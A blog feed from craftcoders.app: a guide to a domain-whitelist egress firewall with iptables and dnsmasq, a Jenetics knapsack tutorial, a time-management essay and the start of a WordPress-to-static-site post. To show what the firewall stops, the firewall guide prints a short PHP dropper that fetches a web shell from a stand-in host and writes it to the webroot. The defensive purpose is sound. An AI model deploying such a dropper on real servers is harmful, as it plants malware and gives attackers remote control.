Building a simple domain name based firewall for egress filtering on Linux with iptables and dnsmasq https://craftcoders.app/building-a-simple-domain-name-based-firewall-for-egress-filtering/ Mon, 16 Aug 2021 11:45:26 +0000

This blog post shows you how you can build a simple firewall on a Linux system that only allows requests to a list of whitelisted domains, using dnsmasq and iptables. Using the newer nftables, which replaces iptables, will also work as long as you use the iptables compatibility layer (iptables-nft).

To follow this blog post you will need to have basic knowledge of networking and *NIX systems.

Background Story

Recently we had to secure a server that runs a WordPress-based application that stores tons of sensitive data. As anybody working in IT security will tell you, WordPress is a nightmare when it comes to security. Luckily only a small part of the application needed to be exposed to the internet at all, so we could hide most of the application behind an authentication proxy with two-factor authentication. However, the application still had to process user input that was submitted over other channels (email, JSON import). So there were still avenues through which an exploit could reach our system without first going through the authentication proxy. And of course exploits that target the authenticated client (XSS, CSRF) remain an issue.

So we asked ourselves what else we could do to further mitigate the risk of an infection. One of the things we discussed was an egress filter that only lets requests pass through to a set of whitelisted domains.

Why do you want to do that?

The goal of most attacks on web applications is to execute code on the web server. In the context of PHP applications this usually means executing PHP code. There are thousands of bots out there that scan the web all day long for known vulnerabilities, exploit systems and install some sort of PHP malware on them. In the PHP world most of these scripts are referred to as web shells. They allow an attacker to steal data from your system, spread SPAM or participate in DDOS attacks. The thing is, these scripts are often rather large: multiple kilobytes and more. Most exploits on the web take place over url parameters, form submissions or file uploads. Except for the last one, these usually only allow very small payloads. This is especially true if you set a short URL limit. That's why attackers will usually use an exploit to deploy a short virus dropper that downloads the actual malware from the internet. The code of a simple, non-obfuscated dropper could look like this:

<?php
$virus = file_get_contents('http://evil.org/virus.php');
file_put_contents('/var/www/html/virus.php', $virus);

This would try to download an evil PHP script from http://evil.org/virus.php and try to save that to the webroot. If the dropper succeeds the attacker could then access the remote shell at http://yourdomain.tld/virus.php.

Here is where output filtering in the firewall can help you. If the firewall blocks the connection to http://evil.org the dropper will fail, and even though the attacker has successfully found an exploit in your web app there will be no damage. Of course, in many cases an attacker could still modify his attack so that it works without downloading anything from the internet. But at this point most bots will probably fail and humans will decide that you are not worth the effort. Security is not absolute, despite what a lot of people in IT will tell you. There is no bike lock that can't be easily defeated in a matter of minutes, but you still lock your bike, don't you? And when the bike standing next to it is better and has a shittier lock, a thief will probably take that bike before he/she takes yours. It is all about protecting your stuff to the level that an attack is not economically sound.

An outbound filter can also help you in a few other scenarios. It can stop spammers from trying to connect to an SMTP server and it can stop exploits that trick PHP into opening a URL instead of a file or opening the wrong URL. And it can help to protect your private data from being sent to diagnostics websites or ad servers.

Think of an outbound filter as one tool of many to fight against attacks. It should however not be your only measure and it will not save your ass in all situations.

Whitelisting ip addresses for outbound traffic with iptables & ipset

The Linux kernel has a built-in firewall. We can configure it with the iptables command. The kernel also allows us to maintain ip sets (lists of ip addresses and networks) to match against. We can configure these lists with the ipset command. On Debian we can install both tools with:

# apt-get install iptables ipset

For this guide we will assume that the interface you want to monitor outgoing traffic on is called eth0. This should be the case on most servers but your interface may be called differently. You can check with ifconfig.
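If you are unsure, you can list all interfaces and their addresses with one of these standard commands:

# ip addr show
# ifconfig -a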

Warning: It is very important that you are careful with the commands listed below. If you do it wrong you can easily lock yourself out of your server by blocking ssh.
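A common precaution before you start (a sketch, assuming the at daemon is installed): schedule a command that flushes the OUTPUT chain in a few minutes, and cancel it once you are sure you can still log in.

# echo "iptables -F OUTPUT" | at now + 15 minutes
# atq                # list the scheduled job and its number
# atrm <job-number>  # remove the job once you know you are not locked out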

First, let's make our life simple and disable IPv6 support on our server, because we are lazy and we really don't want to deal with IPv6 unless we have to 😉 On Debian we can do this with sysctl.

# echo 'net.ipv6.conf.all.disable_ipv6 = 1' > /etc/sysctl.d/70-disable-ipv6.conf 
# sysctl -p -f /etc/sysctl.d/70-disable-ipv6.conf

Next let’s start the actual work by creating a new ip set called whitelist:

# ipset create whitelist hash:net

Now for the iptables rules: first we need to make sure that we only block outgoing traffic for newly created connections and not for connections that have been established from the outside, like SSH:

# iptables -o eth0 -I OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

If your server gets configured via DHCP you will also want to allow all DHCP requests:

# iptables -o eth0 -I OUTPUT -p udp --dport 67:68 --sport 67:68 -j ACCEPT

Next, let's allow all traffic to private ip networks. You can of course decide for yourself if you want that. In our case we are on an AWS Lightsail server and a lot of the servers we need to reach, like the NTP time server, are in the private ip range, so we want to allow them by default. We only really care about blocking access to the internet:

# iptables -o eth0 -A OUTPUT -d 10.0.0.0/8 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 172.16.0.0/12 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 192.168.0.0/16 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 169.254.0.0/16 -j ACCEPT # link local

You may also want to allow traffic to the special broadcasting and multicasting ip addresses:

# iptables -o eth0 -A OUTPUT -d 255.255.255.255 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 224.0.0.22 -j ACCEPT

You should allow requests to your dns servers. For example to allow requests to the Google nameservers (8.8.8.8, 8.8.4.4) add the following:

# iptables -o eth0 -A OUTPUT -d 8.8.8.8 -p udp --dport 53 -j ACCEPT
# iptables -o eth0 -A OUTPUT -d 8.8.4.4 -p udp --dport 53 -j ACCEPT

Now we want to allow all traffic to ip addresses that are on the whitelist that we have created above:

# iptables -o eth0 -A OUTPUT -m set --match-set whitelist dst -j ACCEPT

Now you can add all the ip addresses that you want to allow requests to. For example let's add the address 194.8.197.22 (mirror.netcologne.de) to the whitelist:

# ipset add whitelist 194.8.197.22

Finally let's block all outgoing traffic. Only execute this command if you are sure you have configured all the rules properly (you can check with iptables -L). If you did it wrong you may kill your ssh connection. The blocking rule needs to be the last rule in the list of rules:

# iptables -o eth0 -A OUTPUT -j DROP

There you go, let's hope you still have access to your server. If you don't, a reboot should fix your issues: all the settings will get wiped after a reboot. If you did everything correctly and you execute iptables -L -n to list all the rules, the OUTPUT chain should look something like this:

# iptables -L -n
Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0            udp spts:67:68 dpts:67:68
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0            state RELATED,ESTABLISHED
ACCEPT     all  --  0.0.0.0/0            10.0.0.0/8
ACCEPT     all  --  0.0.0.0/0            172.16.0.0/12
ACCEPT     all  --  0.0.0.0/0            192.168.0.0/16
ACCEPT     all  --  0.0.0.0/0            169.254.0.0/16
ACCEPT     all  --  0.0.0.0/0            255.255.255.255
ACCEPT     all  --  0.0.0.0/0            224.0.0.22
ACCEPT     udp  --  0.0.0.0/0            8.8.8.8              udp dpt:53
ACCEPT     udp  --  0.0.0.0/0            8.8.4.4              udp dpt:53
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0            match-set whitelist dst
DROP       all  --  0.0.0.0/0            0.0.0.0/0

That's it: now all outgoing traffic to ips that are not on the whitelist will get blocked by the firewall. All rules will however get reset after a reboot. To make the rules permanent you need to add the commands to a startup script or make the rules persistent using iptables-persistent (on newer systems netfilter-persistent) and ipset-persistent.
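On Debian that could look roughly like this (a sketch; the package names and the file read by the ipset plugin may differ between releases):

# apt-get install iptables-persistent ipset-persistent
# ipset save > /etc/iptables/ipsets
# iptables-save > /etc/iptables/rules.v4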

DNS Filtering

There is an issue however with our simple iptables filter: it can only work with ip addresses, not domain names. On the web we seldom know the ip addresses of web services in advance. Instead, we connect to a domain name like example.org. The domain name gets resolved to an ip address by DNS, and addresses may change over time. Even worse, most services these days don't even have fixed ip addresses. Therefore an ip address filter alone may not solve your issue. Iptables and ipset simply cannot work with domain names: you can specify a domain name during rule creation, but it will instantly get resolved to an ip address.
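You can see this for yourself. If you pass a domain name to iptables, the rule that ends up in the kernel only contains the ip address(es) the name resolved to at that moment (remove the test rule with -D again afterwards):

# iptables -o eth0 -A OUTPUT -d example.org -j ACCEPT
# iptables -L OUTPUT -n   # the rule shows an ip address, not "example.org"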

A simple alternative to an ip-based filter is DNS filtering. The idea is that you simply block DNS requests for domains you don't want to allow requests to.

We can configure a simple dns whitelist filter with dnsmasq. Dnsmasq is software that can provide DNS and DHCP services to a local network. We will only use it as a dns server listening on 127.0.0.1 that forwards dns requests only for whitelisted domains.

You can install dnsmasq on Debian with:

# apt-get install dnsmasq

After installing dnsmasq you will need to adjust the configuration file in /etc/dnsmasq.conf. For example to only allow traffic to mirror.netcologne.de and example.org the file could look like this:

no-resolv
server=/mirror.netcologne.de/8.8.8.8
server=/mirror.netcologne.de/8.8.4.4
server=/example.org/8.8.8.8
server=/example.org/8.8.4.4

This tells dnsmasq not to use the nameservers from /etc/resolv.conf (no-resolv), so that by default it has no upstream server to forward queries to, and to resolve the addresses mirror.netcologne.de and example.org using the dns servers 8.8.8.8 and 8.8.4.4 (Google DNS). After configuring you will need to restart dnsmasq:

# systemctl restart dnsmasq

You can test your dns server with the dig command:

$ dig A www.example.org @127.0.0.1
$ dig A google.com @127.0.0.1

If you have done everything correctly the first query for www.example.org should return an ip address but the second query for google.com should fail.

To make your system use dnsmasq as dns server you will need to add it to /etc/resolv.conf:

nameserver 127.0.0.1

If you use dhcp your /etc/resolv.conf will probably get overwritten after a while or on restart. To prevent that you can configure dhcp to leave the /etc/resolv.conf file alone. On Debian you can do this using the following commands:

# echo 'make_resolv_conf() { :; }' > /etc/dhcp/dhclient-enter-hooks.d/leave_my_resolv_conf_alone
# chmod 755 /etc/dhcp/dhclient-enter-hooks.d/leave_my_resolv_conf_alone

That's it, you should now have a working dns whitelist filter.

Combining dns filtering and ip filtering

There is however an issue with dns filtering: it's easy to circumvent. All one has to do to bypass it is to specify the ip address directly. And lots of malware/attackers will do just that. This is why I wanted to combine both ideas: we will use dns filtering and automatically add the ip addresses returned by our dns server to the whitelist ipset. This way we can implement a simple domain name based egress filter that will block all other traffic.

Since my whitelist is relatively small (less than 100 entries) I decided to write a simple script that will just resolve all hosts in the whitelist, add the ips to the whitelist and write the ips to a hosts file that is read by dnsmasq. I then trigger this script via a cron job on a short interval, so that the ip addresses in the hosts file are always relatively fresh. That way dnsmasq will always return an ip address that has been previously whitelisted. Since dns by design expects caching, cache times of a few minutes will not pose an issue.
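The core of that refresh step looks roughly like this (a simplified sketch; the full script linked below additionally writes the results to a hosts file for dnsmasq):

# Resolve every whitelisted domain and add the returned ips to the ipset.
for domain in mirror.netcologne.de example.org; do
    for ip in $(dig +short A "$domain" @8.8.8.8 | grep -E '^[0-9.]+$'); do
        ipset add whitelist "$ip" -exist   # -exist: don't fail if the ip is already in the set
    done
done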

Once a day, at night, another cron job will scrub all entries from the ip whitelist, so that outdated ips that are no longer tied to the whitelisted dns names are removed.

I’ve put my code into an easy to use shell script. It includes all the code that you will need to configure iptables, dnsmasq and the cron jobs. You can find it here: https://gist.github.com/gellweiler/af81579fc121182dd157534359790d51.

To install it download it to /usr/local/sbin/configure-firewall.sh and make it executable:

# wget -O /usr/local/sbin/configure-firewall.sh "https://gist.githubusercontent.com/gellweiler/af81579fc121182dd157534359790d51/raw/d1906381462a81cea19c7f15a9d44843ff1ba27c/configure-firewall.sh"
# chmod 700 /usr/local/sbin/configure-firewall.sh

After installing the script you can modify the variables in the top section of the script with your favorite editor to set the domain names that you want to allow and to configure your dns servers. By default the AWS Debian repos and the WordPress APIs are allowed.

To install all necessary packages (iptables, dnsmasq, dig) on debian you can run:

# /usr/local/sbin/configure-firewall.sh install

To disable ipv6 support on your system you can run:

# /usr/local/sbin/configure-firewall.sh disable_ipv6

To start the firewall you can execute the following command:

# /usr/local/sbin/configure-firewall.sh startup

This will configure iptables and dnsmasq. After that you can test the firewall.

To refresh the ip addresses after you made changes to the list of dns names in the top of the script or to update outdated dns results you can run:

# /usr/local/sbin/configure-firewall.sh refresh_ips

If you are happy with the result you can make the changes permanent with:

# /usr/local/sbin/configure-firewall.sh configure_cronjob

This will create 3 cronjobs: one that will run on startup, one that will refresh the ips every 10 minutes and one that will flush the ip whitelist at 4 o’clock in the morning.

Since I'm using the script on an AWS Lightsail server that has no recovery console, I've added a delay of 90 seconds to the startup cron job. That means the firewall will only get activated 90 seconds after boot. That way, if I ever mess up the firewall and lock myself out of SSH, I can reboot the server using the web console and have enough time to ssh into it and kill the script. It of course also means that the firewall will not run for a short time after booting. An acceptable risk for me since I will only restart the server in very rare instances.
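The resulting crontab entries look roughly like this (a sketch; the exact times and the flush command are assumptions, check the script for the real entries):

@reboot      sleep 90 && /usr/local/sbin/configure-firewall.sh startup
*/10 * * * * /usr/local/sbin/configure-firewall.sh refresh_ips
0 4 * * *    ipset flush whitelist && /usr/local/sbin/configure-firewall.sh refresh_ips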

Conclusion

Using iptables and dnsmasq we can hack together a simple dns based whitelist-based firewall for outgoing traffic. In this basic form only the A record is queried. The A record is used for most web services. If you rely on other records (for example the MX record for mail servers) you will have to adjust the script. Adding an egress filter can add some extra security to a web server. It is however not a silver bullet that will magically protect you against all exploits. Also if you run the firewall on the web server and an attacker gains root access to your machine he/she can simply disable the firewall.

 

Solving the Knapsack Problem with the Jenetics Library https://craftcoders.app/solving-the-knapsack-problem-with-the-jenetics-library/ Thu, 13 May 2021 10:46:48 +0000

According to its official documentation, Jenetics is a library for programming evolutionary algorithms in Java. Jenetics is implemented using the Java Stream interface, so it works smoothly with the rest of the Java Stream API. Evolutionary algorithms have their roots in biology, as they use mechanisms inspired by biological evolution, such as reproduction, mutation, recombination, and selection. If you want to learn more about the theory behind evolutionary algorithms, I'd suggest reading Introduction to Evolutionary Algorithms first.

Disclaimer: This blog post is based on Introduction to Jenetics Library from Baeldung, but it uses the current library version (6.2.0) and a more complex example: the knapsack problem, without using the classes the library provides for this problem.

The knapsack problem

Given a set of items, each with a weight and a value, determine the number of each item to include in a collection so that the total weight is less than or equal to a given limit and the total value is as large as possible. It derives its name from the problem faced by someone who is constrained by a fixed-size knapsack and must fill it with the most valuable items.

Wikipedia
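To make the problem concrete with a tiny instance: given a knapsack of size 5 and three items with (size, value) of (3, 4), (4, 5) and (2, 3), the best packing is the first and the third item for a total value of 7. Taking the second item alone only yields a value of 5, and combining it with any other item would exceed the size limit.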

Defining the problem in code

In the following example, we have a class called “Knapsack” that represents our problem. The class defines items that consist of a size and a value (possibleKnapsackItems). These items are initialized with random values between 0 and 10 and put in a list to represent the items we can put into our knapsack. Furthermore, the class defines the maximum size the knapsack can hold. Attention: Don’t mix up the size of the knapsack (Knapsack.getKnapsackSize) with the number of items that we could put in the knapsack (Knapsack.getItemCount). The items that we actually put into the knapsack will be defined later in our evolutionary algorithm.

public final class Knapsack {
    private final List<Item> possibleKnapsackItems; // items that *might* end up in the knapsack, depending on chromosome
    private int knapsackSize;

    public Knapsack(List<Item> possibleItems, int knapsackSize) {
        this.possibleKnapsackItems = possibleItems;
        this.knapsackSize = knapsackSize;
    }

    public static Knapsack initializeWithRandomItems(int size, int knapsackSize) {
        Random random = new Random(123);
        List<Item> items = Stream.generate(() -> 
                new Item((int) (random.nextDouble()*10),(int) (random.nextDouble()*10)))
                .limit(size)
                .collect(Collectors.toList());
        return new Knapsack(items, knapsackSize);
    }

    public Item getItemByIndex(int index) { return this.possibleKnapsackItems.get(index); }
    public int getItemCount() { return this.possibleKnapsackItems.size(); }
    public int getKnapsackSize() { return this.knapsackSize; }

    public static final class Item {
        private final int size;
        private final int value;

        public Item(final int size, final int value) {
            this.size = Requires.nonNegative(size);
            this.value = Requires.nonNegative(value);
        }

        public int getSize() { return size; }
        public int getValue() { return value; }
    }
}

Let’s get started with the Jenetics Library

In order to use Jenetics, we need to add the following dependency into our build.gradle:

implementation 'io.jenetics:jenetics:6.2.0'

Next we create a runnable class App that will use the Jenetics library and our Knapsack class to run a genetic algorithm. First, let’s make use of our previously created class: We create a knapsack with a size of 100 and 80 items from which we can pick.

public class App {
    private final static int ITEM_COUNT = 80;
    private final static int KNAPSACK_SIZE = 100;
    private final static int POPULATION_SIZE = 500;

    private final Knapsack knapsack = Knapsack.initializeWithRandomItems(ITEM_COUNT, KNAPSACK_SIZE);

    public static void main(String[] args) {
        new App().run(POPULATION_SIZE);
    }

    public void run(int populationSize) {
        // TODO Run the genetic algorithm
    }
}

Let's work on the run() function. We need to convert the Knapsack problem into another representation that a genetic algorithm can work with, namely a chromosome. And indeed we can transform it into a so-called binary problem, where each one represents an item we put into the knapsack and each zero represents an item we leave out.

Using the Jenetics library we can create a BitChromosome with a length of 80 which is equal to the number of items we can choose from (ITEM_COUNT) and a probability of having 1’s in the chromosome equal to 0.3. These BitChromosomes are accessible via a factory, meaning we can generate as many randomly initialized chromosomes as we want our population size to be.

final Factory<Genotype<BitGene>> gtf =
        Genotype.of(BitChromosome.of(this.knapsack.getItemCount(), 0.3));

Now, let’s create the execution environment:

final Engine<BitGene, Integer> engine = Engine
        .builder(this::fitness, gtf)
        .populationSize(populationSize)
        .build();

The Engine will run our genetic algorithm and needs a few pieces of information:

  1. The factory we just created, that produces our random chromosomes
  2. The number of random chromosomes we want to create and compare (called populationSize)
  3. Last but not least, a fitness function which we didn’t define, yet

The Fitness Function

The fitness function calculates the fitness of each chromosome. In the case of the knapsack problem, the fitness is the sum of the values of the items that we place in our knapsack (i.e. the items with a corresponding one in the chromosome), as long as those items actually fit: a selection whose total size exceeds the knapsack size should score 0. How to put that into code is something you can think about now 😉

private Integer fitness(Genotype<BitGene> gt) {
    BitChromosome chromosome = gt.chromosome().as(BitChromosome.class);
    int fitness = 0;
    // TODO: Calculate fitness
    return fitness;
}

A first run

In the final step, in our run function, we add some basic statistics, start the evolution and collect the results:

final EvolutionStatistics<Integer, ?> statistics = EvolutionStatistics.ofNumber();
final Phenotype<BitGene, Integer> best = engine.stream()
        // Truncate the evolution stream after 10 "steady"
        // generations.
        .limit(bySteadyFitness(10))
        // Update the evaluation statistics after
        // each generation
        .peek(statistics)
        // Collect (reduce) the evolution stream to
        // its best phenotype.
        .collect(toBestPhenotype());

System.out.println(statistics);
System.out.println(best);

If you put everything together and implemented the fitness function correctly, you should end up with a result looking like this:

+---------------------------------------------------------------------------+
 |  Time statistics                                                          |
 +---------------------------------------------------------------------------+
 |             Selection: sum=0,029213700000 s; mean=0,000811491667 s        |
 |              Altering: sum=0,120244900000 s; mean=0,003340136111 s        |
 |   Fitness calculation: sum=0,054355500000 s; mean=0,001509875000 s        |
 |     Overall execution: sum=0,199033900000 s; mean=0,005528719444 s        |
 +---------------------------------------------------------------------------+
 |  Evolution statistics                                                     |
 +---------------------------------------------------------------------------+
 |           Generations: 36                                                 |
 |               Altered: sum=133.010; mean=3694,722222222                   |
 |                Killed: sum=0; mean=0,000000000                            |
 |              Invalids: sum=0; mean=0,000000000                            |
 +---------------------------------------------------------------------------+
 |  Population statistics                                                    |
 +---------------------------------------------------------------------------+
 |                   Age: max=14; mean=2,183056; var=7,349621                |
 |               Fitness:                                                    |
 |                      min  = 0,000000000000                                |
 |                      max  = 188,000000000000                              |
 |                      mean = 134,464166666667                              |
 |                      var  = 4503,017550280571                             |
 |                      std  = 67,104527047589                               |
 +---------------------------------------------------------------------------+
 [11101010|00000100|11000101|10001000|10001111|10100000|01010010|10110000|11000101|10000101] -> 188

If so, congratulations! You made it.

Further Optimization

So up until now, we told the engine to work with a population of 500 chromosomes and let it decide on its own how to do mutation, recombination, and selection. Of course, if you want to improve the quality of your best phenotype you can configure these things yourself. An easy thing to do is to let the evolution run longer, e.g. by raising the steady-fitness limit or adding a generation limit of 5000, and your results will probably improve. But you can also tweak several things like mutation yourself:

final Engine<BitGene, Integer> engine = Engine
        .builder(this::fitness, gtf)
        .populationSize(populationSize)
        .survivorsSelector(new TournamentSelector<>(5))                    
        .offspringSelector(new RouletteWheelSelector<>())                   
        .alterers(
            new Mutator<>(0.115),
            new SinglePointCrossover<>(0.16))
        .build();

But to gain some real improvements using your own configuration is something that is pretty time consuming and would need another blogpost, so I’ll leave that to you 😀

Greetings,

Domi

Time Management: Doing Less lets you Achieve More https://craftcoders.app/time-management-doing-less-lets-you-achieve-more/ Mon, 14 Sep 2020 08:00:00 +0000

“There is surely nothing quite so useless as doing with great efficiency what should not be done at all.” – Peter F. Drucker [1]

Effectiveness and Efficiency

Do you know the difference between effectiveness and efficiency? Effectiveness is the relationship between a goal achieved and a goal set, whereas efficiency is the ratio of the achieved goal to the effort. Thus effectiveness is a measure of usefulness and efficiency is one of economy. This is where it gets interesting, because the result of efficient work does not have to serve my set goals (or those of my company) and is therefore not automatically effective. Moreover, it often happens that we do bullshit efficiently. Checking e-mail 30 times a day and developing an elaborate system of rules and sophisticated techniques to ensure that these 30 brain farts are processed as quickly as possible is efficient but far from being effective [2]. We often assume that when people are busy, they work on important tasks, implying effectiveness. Unfortunately, this is often not true.

But why does this happen? In my opinion two quite distinct situations cause this behavior. The first, and rather rare, situation is that there is nothing important to do. When we then have to ask ourselves what to do next, we decide, more or less consciously and depending on whether we are at work or not, to do tasks/things that are not very effective. Taking a break or doing nothing is usually not an option, because we hate not using time and are afraid of social disregard (e.g. by colleagues). Someone who takes a break while others work is called lazy faster than he/she would like, even if it is not guaranteed that the others work effectively. That's why we prefer to do bullshit instead of taking a targeted break, at least at work. But as already mentioned, this situation is quite rare in my opinion, because many people look for new challenges if there is nothing important to do. The second situation is that there are a few critical tasks that would bring me (or the company) closer to my goals. Being busy is then used as an excuse to avoid these most unpleasant tasks. Effective work fails not because of the amount or complexity of tasks, but because of distraction or working on unimportant things. There are thousands of useless things you can do (efficiently): sort Outlook contacts, clean up the filing cabinet, write an unimportant report, and so on. Whereas it is difficult, for example, to call the Head of Department to say that something cannot be done as planned and that a new meeting with the customer is needed.

These considerations lead me to the following conclusion: It is much more important what you do than how you do it. Don’t get me wrong, efficiency is something very important. But you should consider it secondary in comparison to effectiveness. So now let’s have a look at the Pareto Law as it is a rule which helps us to identify important/critical tasks. 

Pareto’s 80/20 Law

Pareto is a rather well-known and controversial economist. He became known mainly through the rule named after him: Pareto's Law. This rule is explained quite simply: 80% of a result comes from 20% of the effort [3]. Depending on the context, you can find different variations of this, like

  • 80% of the consequences come from 20% of the causes,
  • 80% of the revenue comes from 20% of the products (and/or customers),
  • 80% of costs come from 20% of the purchases,

and so on. The exact ratio varies and you find examples from 70/30 to 99/1; what is significant is the large imbalance. Even though most people realize that this rule can't apply to everything, and it is therefore discussed with good reason, Pareto makes a point here. Just because of the circumstances already mentioned above, and a few more, we often tend to work ineffectively. This creates an imbalance between effort and useful results. The Pareto rule pushes us to identify self-reflectively where we waste time and to find out what is important for our goals. So here you can try to answer the following questions for yourself:

  • What 20% causes 80% of my problems?
  • What 20% causes 80% of my useful outcomes?

or in a personal way:

  • What 20% causes 80% of my unhappiness?
  • Which 20% causes 80% of what makes me happy?

These questions can be used to identify critical tasks or circumstances and thus allow us to decide what we should do. Or, as in most cases, what we should stop doing, e.g. caring for a lot of customers who only generate a fraction of the revenue. Another simple question that helps us identify what we should do is the following: If you were only allowed to work two hours a day, what tasks would you do and what tasks would you avoid at all costs? This simple question helps to identify the critical tasks and leads us to the final topic: how to get shit done in time.

Parkinson’s Law

Time is wasted because there is so much of it [4]. As an employee, you are usually not free to choose how long you want to work each day. Most people have to work between 8-12 hours. While the hours worked matter for physical labor, for most creative, constructive, and conceptual jobs they feel more like servitude. Because you are obliged to be in the office, you create activities to fill the time. Being at work for 8 hours does not mean that you are creative for 8 hours, or even able to be creative for that long. Also, don't get me wrong on this: there are days when you can work very effectively for a long time, but often in the context of deadlines. And that's what Parkinson's Law is about:

“Work expands so as to fill the time available for its completion” – C. Northcote Parkinson [5]

Or in other words: A task expands to the exact degree that time is available to complete it, not to the degree that it is actually complex [6]. If you had a day to deliver a project, the time pressure would force you to concentrate on your work and do only the most essential things. If you had 2 weeks for the same task, it would take you two weeks and you would probably waste much more time on unimportant subtasks. This does not mean that we can do everything if we set the deadline short enough, but that we work much more effectively if we set ourselves tight deadlines.

Try it out

To sum it up in one sentence: Doing less lets you achieve more! With Pareto, you can identify the few tasks that are critical for your goals. And according to Parkinson's Law, you should shorten the work time so that you stick to these critical tasks and do not inflate the goals unnecessarily. Try it out! Choose a personal goal or your current company task. Ask yourself which the really important (sub-)tasks are (80/20 helps). Afterwards, shorten your time to work on these tasks to a limit (e.g. 2 hours a day) and set yourself a tight deadline to deliver. For the deadline, it is important that it feels uncomfortable or even seems impossible. The goal is not to have everything done by tomorrow in magical ways, but to increase the focus. When the deadline has passed, look at what you have achieved. Probably much more in less time.

One last note: In my opinion, these rules do not serve to maximize the time gained for other work, but to free it up. We should try to get the important things done in little time and use the remaining time for our interests and private life to have a healthy balance. The goal is not having 4 slots of 2-hour pure effectiveness, but having one or two and not wasting the rest of the (work) time.

Key Takeaways

  • Being busy is not equal to being effective. 
  • Being efficient does not imply being effective.
  • We use busyness to postpone critical and unpleasant tasks.
  • We use busyness to avoid apparent “time-loss” and social disregard.
  • It is much more important what you do than how you do it.
  • Pareto gives you the possibility to identify what you should do.
  • Parkinson's Law lets you stay focused on the important things.
  • Doing less lets you achieve more.

Sources

[1] Peter Ferdinand Drucker: Managing for Business Effectiveness. Harvard Business Review. 3, May/June, 1963, P. 53–60 (hbr.org opened 04/09/2020).

[2] Timothy Ferriss, The 4-Hour Workweek, Page 69

[3] Bunkley, Nick (March 3, 2008). "Joseph Juran, 103, Pioneer in Quality Control, Dies". The New York Times. (opened 04/09/2020)

[4] Timothy Ferriss, The 4-Hour Workweek, Page 75

[5] C. Northcote Parkinson, Parkinson’s Law, The Economist. 177, No. 5856, 19. November 1955, P. 635–637.

[6] M. Mohrmann: Bauvorhaben mithilfe von Lean Projektmanagement neu denken. 4. Auflage. BoD, 2011, ISBN 978-3-8391-4949-2, P. 55.

WordPress without the security hassles – using GitLab CI/CD to automate transforming WordPress into a static website https://craftcoders.app/wordpress-vs-static-web-pages-the-best-of-both-worlds/ Sun, 29 Mar 2020 18:02:07 +0000

Recently we launched our new company website (craftcoders.app). It's a simple website that showcases us and our work and describes the kind of services that we provide to customers. It requires no dynamic features except for the contact form.

We decided to build our website with WordPress, but to automatically generate a static copy of it and serve that to visitors. We're using GitLab CI/CD as our automation tool. This guide will explain how you can set up your own pipeline to generate a static website from a WordPress site on a regular schedule or manually. But first we'll have a detailed look at the pros and cons of WordPress and static websites in the next section. Feel free to skip over it if this is not of interest to you.

The ups and downs of WordPress and static websites

At craft-coders we value efficiency, and we try to choose the right tool for the job. WordPress is the leading CMS for small websites. It’s easy to set up and deploy. At the time of writing ~35% of all websites on the internet are built with it. Because of its popularity there are tons of useful plugins and great themes available. So that you can build good-looking and feature rich websites really quickly.

But WordPress has its downsides. Mainly it sucks at security. So famously, that ~1/5 of the Wikipedia article on it focuses on its vulnerabilities. The plugin market for WordPress does not provide any quality checks and if you look at the code base of most plugins (even some popular ones), any self-respecting programmer will scream out in agony.

Because of this we are very much against using WordPress for more than simple representational websites and blogs. Basically, if your website is built on WordPress you must expect to get hacked. It's therefore crucial that your WordPress installation is running on a server that isn't storing any sensitive information about you or your customers and that you use passwords that are used nowhere else. If people really need to log into your website, then at best you use an external authentication service, so that no information about passwords is stored on your server.

Still, even if there is nothing of value to gain for a potential attacker, so that a targeted attack against your website is very unlikely and getting hacked is more a nuisance than an actual problem, you still need to take basic precautions. Due to the popularity of WordPress there are a lot of bots out there that just scan the web for known vulnerabilities. They try to hack as many web pages as possible and use them to spread SPAM emails, viruses and propaganda, or use your server to mine Bitcoins.

The most important thing that you must do to protect yourself from bots is to keep your WordPress installation and its plugins updated at all times. This can be very annoying because updates may break things. And for most small websites the goal is often to deploy and forget. You don't want to spend time fostering your site, but just want it to continue to function as expected and be done with it. The ultimate goal of every person in operations is to go unnoticed. If you have an admin that is constantly running around fixing stuff he/she is probably not doing a good job, or he/she has to compensate for the mistakes of the developers. You want things to work without having to think about them.
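If you have shell access, one way to take some of the pain out of updating (a sketch, assuming WP-CLI is installed on the server) is to run the updates from a cron job:

wp core update && wp plugin update --all && wp theme update --all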

While WordPress is the nightmare of every admin, static web pages are the dream of every person working in operations. They're super easy to deploy, work super fast, can be kept in RAM and requests can be distributed between as many servers as you like. Because there is no code running on the server involved, they are basically unhackable. Provided of course that your webserver is secure, but since you can just rent a managed server this isn't really an issue that you need to concern yourself with. Yes, attacks running in the client's browser exploiting flaws in JavaScript or CSS are still feasible, but since a truly static website by definition has no valuable cookies or private information to steal, there is little to be gained by performing an attack in this manner (talking to authenticated REST services can change that picture of course).

There are a few good static site generators out there, but as of now none of them provides an easy-to-use GUI and as many plugins/themes as WordPress. If your goal is to build a simple website fast, WordPress should still be your first choice. Also, if you decide to go with a static site generator there is no going back; your site will forever be static. Of course, you're always free to use JavaScript to talk to REST services, and that is a good design choice, so this sounds more dramatic than it actually is.

To sum it up WordPress is great for editors and site-builders but it sucks in operations. In contrast, static web pages are hard to use by editors and usually require more development effort than WordPress, but they are great in operations. This is a classic development vs. operations issue.

Using WordPress to generate a static web page

What if you could have both? Why not have a private, non-accessible installation of WordPress and generate a static copy from it? Then you can deploy that copy to a publicly accessible web space. That way you have the best of both worlds. Of course you deprive yourself of the dynamic features of WordPress, so no comment fields and no login sections, but if you don't need any of that, this is a perfect solution for you. And if your requirements ever change you can always replace your static copy with the real thing and go on with it.

This is the basic idea. The first thing we tried out was the WP2Static plugin which aims at solving this issue, but we couldn't get it running. We then decided to build our own solution using our favorite automation tool GitLab CI/CD. We used gitlab.com, and at the moment they are offering 2000 free CI minutes to every customer, which is a really sweet deal. But any CI tool should do; you should not have many issues porting this guide to Jenkins or any other tool that can execute bash scripts. Also, we're assuming you are using Apache (with mod_rewrite) as web server and that you can use .htaccess files. But porting this concept to other web servers shouldn't be too difficult.

